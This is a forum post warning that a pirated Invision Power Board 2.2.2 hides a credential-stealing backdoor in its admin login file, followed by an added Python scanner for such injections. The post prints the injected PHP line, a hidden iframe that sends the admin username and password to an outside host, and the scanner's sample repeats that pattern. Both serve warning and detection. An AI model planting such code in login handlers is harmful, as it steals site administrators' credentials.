DarkDragonLord
Greetings everyone!
Well, just to let you know. This warning is for everyone, but more for those who think they are smarter than everyone, not buying the license but just downloading IPB from the internet.
But, this can warn other people too.
When you go to www.randomdomainhere.com/forums/admin.php, it sends you to forums/admin/index.php, right? OK, nothing new up to here:
When you put in your login and password and hit OK, it loads and a "Log In Successful" appears.
OK, but did you notice that you might be giving your user/pass to anyone? You might ask "How? Anyway, it's MY forum".
Yeah, but someone added code to the PHP of the admin login xD Look at this:
http://img251.imageshack.us/img251/5633/suspeito2tw7.jpg
So, when you log in, first it gives all your info to these bastards, THEN you log in.
I've checked all the damn PHP related to the admin of IPB and found the string. It's inside <forumfolder>/sources/action_admin/login.php
Then, find the array $connector. If you find it, take a look and you will see the string giving all your info to the website.
You might find it like this:
PHP:
$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';
$this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad
(....)
Delete everything related to $connector (everything up to the div>'; , since the $this on the next line just redirects you to the real admin CP), save and re-upload.
Now when you log in, you will notice that your info isn't given to anyone anymore.
If you check the website that is receiving the info, it's offline. But this is a service LIKE no-ip, so watch yourself.
I found this while installing and testing a non-official IPB 2.2.2 for my friend, since he can't pay for the license >.<
Well, that was just a warning to you people: watch yourself and your info. This can be done anywhere in any non-official forum.
Hope this helps someone ;D
See you
DDL
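A defensive check for the kind of injection described in the post above, as an added example that is not part of the original post and not IPB code: it scans PHP source for lines that concatenate a login field into a URL on a host other than your own. The field-name list, the `own_hosts` parameter and the sample host `collector.example.invalid` are assumptions made for this sketch.

```python
import re
from pathlib import Path

# Request fields that carry credentials in a login handler (assumed list).
CRED = re.compile(r"""(?:input|_POST|_REQUEST|_GET)\s*\[\s*['"](?:pass(?:word)?|username)['"]\s*\]""", re.I)
# Absolute URL literal embedded in the source; group 1 is the host.
URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Markup the admin never sees rendered on the login page.
HIDDEN = re.compile(r"display\s*:\s*none|<iframe", re.I)


def scan_php_source(text, own_hosts=()):
    """Return [(line_no, host, reasons)] for credential fields placed in a foreign URL."""
    # Limitation: works line by line, so a concatenation split over lines is missed.
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if not CRED.search(line):
            continue
        for host in URL.findall(line):
            if host.lower() in own_hosts:
                continue
            reasons = ["credential field concatenated into external URL"]
            if HIDDEN.search(line):
                reasons.append("hidden markup")
            findings.append((no, host.lower(), reasons))
    return findings


def scan_tree(root, own_hosts=()):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php_source(path.read_text(errors="replace"), own_hosts)
        if found:
            hits[str(path)] = found
    return hits


# Constructed sample: line 2 imitates the shape of the injected code, lines 3-4 are benign.
SAMPLE = r'''<?php
$connector = '<div style="display:none"><iframe src="http://collector.example.invalid/c.php?user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '"></div>';
$ok = ( md5($this->ipsclass->input['password']) == $row['hash'] );
$help = 'See http://forum.example.org/help';
'''

if __name__ == "__main__":
    for no, host, reasons in scan_php_source(SAMPLE, own_hosts={"forum.example.org"}):
        print(f"line {no}: {host}: {', '.join(reasons)}")
```

Run `scan_tree` against the whole forum directory, not only `login.php`, since the same pattern can be planted in any file that handles a login.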